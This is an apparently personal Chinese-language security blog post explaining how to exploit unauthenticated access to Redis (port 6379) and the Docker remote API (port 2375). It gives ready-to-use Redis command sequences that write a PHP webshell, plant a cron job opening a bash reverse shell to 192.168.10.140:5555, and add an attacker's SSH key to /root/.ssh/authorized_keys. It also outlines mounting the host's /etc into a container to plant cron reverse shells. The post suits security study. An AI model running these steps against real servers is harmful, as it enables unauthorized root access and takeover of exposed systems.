Redis&Docker未授权访问漏洞
(0)

Redis

  • Redis

Redis是一个高性能的key-value数据库,它的数据库存在内存中,读写速度非常快,应用在缓存方向。
Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步
我下载的是redis-4.0.10版本,该版本默认开启保护 模式,外部IP无法连接所以先关闭保护模式,重启配置文件
Redis命令:
rce文件夹下:./redis-server redis.conf #重启配置文件
redis-server #启动服务
./redis-cli -h 192.168.61.135 #客户端进行连接
config get dir #得到redis备份路径

  • 未授权访问漏洞

Redis在默认情况下,绑定在6379端口,当该端口对外开放、未作密码认证(一般为空)时,任意用户可未授权访问redis服务并操作获取其数据。

  • 利用redis写webshell

条件:目标开启web服务器并且知道web路径,有读写增删改查权限

 config set dir /var/www/html   #设置工作目录
 config set dbfilename 1.php   #设置文件名
 set webshell "<?php phpinfo();?>"   #
 save                          #保存一次备份操作
  • 在crontab里写定时任务反弹shell

Linux下的任务调度分为两类:系统任务调度和用户任务调度。Linux系统任务是由 cron (crond) 这个系统服务来控制的,这个系统服务是默认启动的。用户自己设置的计划任务则使用crontab 命令
contab:

 用来定期执行程序的命令,在目录/etc/crontab

攻击机写入反弹shell并监听端口:

 set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.10.140/5555 0>&1\n\n"
  • 写ssh公钥getshell

config命令可以进行写文件操作,攻击者可以将自己的ssh公钥写入目标服务器的/root/.ssh文件夹(有时候不存在.ssh目录,需要生成公、私钥或者建立ssh连接时才会生成)的authotrized_keys文件中,然后使用对应私钥直接使用ssh服务登录目标服务器。

攻击机生成ssh公钥:

 ssh-keygen -t rsa
 (echo -e "\n";cat id_rsa.pub;echo -e "\n")>key.txt     #把公钥写入key.txt文件
 cat /root/.ssh/key.txt |./redis-cli -h 192.168.61.135 -x set pub    #写入redis缓冲
 config set dir /root/.ssh                 #设置路径
 config set dbfilename authorized_keys
 save

在.ssh路径下:

 ssh 192.168.61.135     ssh登录服务器

参考链接:
https://www.cnblogs.com/yuzly/p/11663822.html
https://www.cnblogs.com/bmjoker/p/9548962.html

Docker

  • Docker

Docker是一个开源的引擎,可以为应用创建容器,实现虚拟机隔离应用环境。

  • 未授权访问漏洞

https://www.secpulse.com/archives/45905.html
如果在docker上配置了远程访问,docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,如果没有做限制访问来源的话,攻击者就可以通过Docker未授权来控制服务器。
攻击者可以从docker client 或 http请求 访问此API,但是docker执行命令只能在container内部,与宿主机是隔离的
docker 运行 container的时候,可以将本地文件或目录作为volume挂载到container内,并且在container内部,这些文件和目录是可以修改的。

  • 利用挂载目录的方式写ssh公钥getshell
  • 写定时任务反弹shell

启动一个容器,并将宿主机的/etc目录挂载到容器中,便可以任意读写文件了。我们可以将命令写入crontab配置文件,进行反弹shell。

参考链接:
https://www.hetianlab.com/expc.do?ec=ECIDcc41-1aa8-4db8-8f69-7e834b8aa17b

本文为作者hackerbo.com发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论